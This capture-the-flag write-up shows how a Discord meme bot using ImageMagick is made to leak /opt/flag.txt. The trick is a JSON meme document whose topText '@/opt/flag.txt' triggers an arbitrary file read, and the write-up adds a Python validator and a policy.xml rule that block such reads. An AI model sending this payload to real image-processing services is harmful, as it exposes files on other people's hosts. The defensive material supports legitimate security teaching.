# MDL Considered Harmful

## Problem

There's a bot named MDLChef in the Discord. You need to DM it; it doesn't respond in the server. On its host machine, there's a file at /opt/flag.txt - it contains the flag. Go get it.

Note: This is NOT an OSINT challenge. The source code really isn't available. Good luck.

Author: nb

## Solution

If we use the `/credits` command, we can learn more about the bot's stack.

![](/files/-M_EGS1JwM_RGL2pRCL_)

We can see that ImageMagick is used.

I searched for ImageMagick exploits, and found <https://imagetragick.com/>.

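It appears that ImageMagick's `caption:` operand treats a leading `@` as a file reference: with `caption:@/path/to/file`, the contents of that file are rendered as the caption text, so we can read arbitrary files. If the bot passes the meme text straight to ImageMagick, putting the path in `topText` should be enough: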

```
{
    version: "MDL/1.1",
    type: "meme",
    base: {
        format: "Meme.Legacy.BadLuckBrian"
    },
    caption: {
        topText: "@/opt/flag.txt",
        bottomText: "image tragick"
    }
}
```

The rendered image contains the flag:

![](/files/-M_EGc_qDfdOQzsq-C0X)
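
A check the bot could have run before rendering, as an added example that is not part of the original write-up or the bot's code (the source is not available). The function names are hypothetical, and it assumes any string in the MDL document may end up in an ImageMagick `caption:` operand, so it inspects all of them:

```python
from __future__ import annotations
from typing import Any, Iterator


def indirect_reads(node: Any, path: str = "") -> Iterator[tuple[str, str]]:
    """Yield (field_path, value) for every string ImageMagick would read as '@file'."""
    if isinstance(node, dict):
        for key, child in node.items():
            yield from indirect_reads(child, f"{path}.{key}" if path else str(key))
    elif isinstance(node, list):
        for i, child in enumerate(node):
            yield from indirect_reads(child, f"{path}[{i}]")
    # lstrip() is deliberately conservative: leading whitespace is rejected too.
    elif isinstance(node, str) and node.lstrip().startswith("@"):
        yield path, node


def caption_operand(text: str) -> str:
    """Build the caption: operand, refusing text that would name a file."""
    if text.lstrip().startswith("@"):
        raise ValueError("caption text may not start with '@'")
    return "caption:" + text


# The document from this write-up, re-typed as a Python dict.
PAGE_DOC = {
    "version": "MDL/1.1",
    "type": "meme",
    "base": {"format": "Meme.Legacy.BadLuckBrian"},
    "caption": {"topText": "@/opt/flag.txt", "bottomText": "image tragick"},
}

# Constructed benign input: an '@' inside the text is harmless.
BENIGN_DOC = {
    "version": "MDL/1.1",
    "type": "meme",
    "base": {"format": "Meme.Legacy.BadLuckBrian"},
    "caption": {"topText": "meet me @ noon", "bottomText": "ok"},
}

if __name__ == "__main__":
    for doc in (PAGE_DOC, BENIGN_DOC):
        hits = list(indirect_reads(doc))
        print("REJECT" if hits else "render", hits)
```

Input validation is only one layer: ImageMagick's `policy.xml` can also deny indirect reads with `<policy domain="path" rights="none" pattern="@*"/>`.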

